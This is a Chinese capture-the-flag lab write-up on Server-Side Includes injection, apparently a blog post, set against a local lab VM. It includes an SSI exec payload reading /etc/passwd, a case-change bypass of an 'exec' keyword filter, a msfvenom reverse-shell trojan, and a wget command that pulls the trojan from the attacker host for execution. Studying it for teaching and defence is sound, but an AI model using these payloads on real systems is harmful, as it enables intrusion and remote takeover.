CTF-SSI注入

SSI注入

SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
参考链接:https://blog.csdn.net/bylfsj/article/details/101451413

实验环境:

攻击者:Kali Linux(192.168.100.146)
靶机:VMware workstations Pro——Ubuntu 6(32-bit)(192.168.100.133)

实验流程:

  • 端口扫描,服务探测
    命令:nmap -sV 192.168.100.133
    开放了80端口,Web服务——Apache服务器
    在这里插入图片描述
  • 目录扫描
    命令:dirb http://192.168.100.133
    敏感目录:robots.txt文件、ssi目录等
    在这里插入图片描述
  • Web详细信息探测
    命令:nikto -host http://192.168.100.133
    发现了敏感文件:index.shtml
    在这里插入图片描述
  • 网站下面有Ssi目录,结合该网站目录下面的index.shtml,判断该网站可能使用了ssi技术。
    在这里插入图片描述
  • 网站下面的index中存放着SSI命令执行的关键字
    在这里插入图片描述
  • http://192.168.100.133/index.php中疑似有命令执行功能,通过上面的关键字构建要执行的命令。<-- #exec cmd=“cat /etc/passwd” -->
    在这里插入图片描述
  • 网站对用户输入的内容进行了过滤,Target输入框中对尖括号进行了过滤,Feedback输入框中对exec关键字进行了过滤。
    在这里插入图片描述在这里插入图片描述
  • 尖括号绕过方式有限,尝试绕过对于关键字exec的检测过滤,使用大小写的方式绕过。
    在这里插入图片描述在这里插入图片描述
  • 成功绕过防御,构造命令
    在这里插入图片描述在这里插入图片描述
  • 生成木马,上传到靶机root用户家目录
    利用msfvenom生成木马,利用python反弹shell
    在这里插入图片描述
  • 将生成的木马放在/var/www/html(httpd服务的网站主目录)下面
    在这里插入图片描述
  • 启动kali的httpd服务
    在这里插入图片描述
  • 靶机上面执行命令使用wget下载文件并执行。 wget http://192.168.100.146/shell.py
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • 监听端口,反弹shell
    在这里插入图片描述在这里插入图片描述
  • 执行木马
    在这里插入图片描述
  • 反弹shell
    在这里插入图片描述
    在这里插入图片描述
  • 优化shell
    在这里插入图片描述
  • 获取权限
    在这里插入图片描述
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值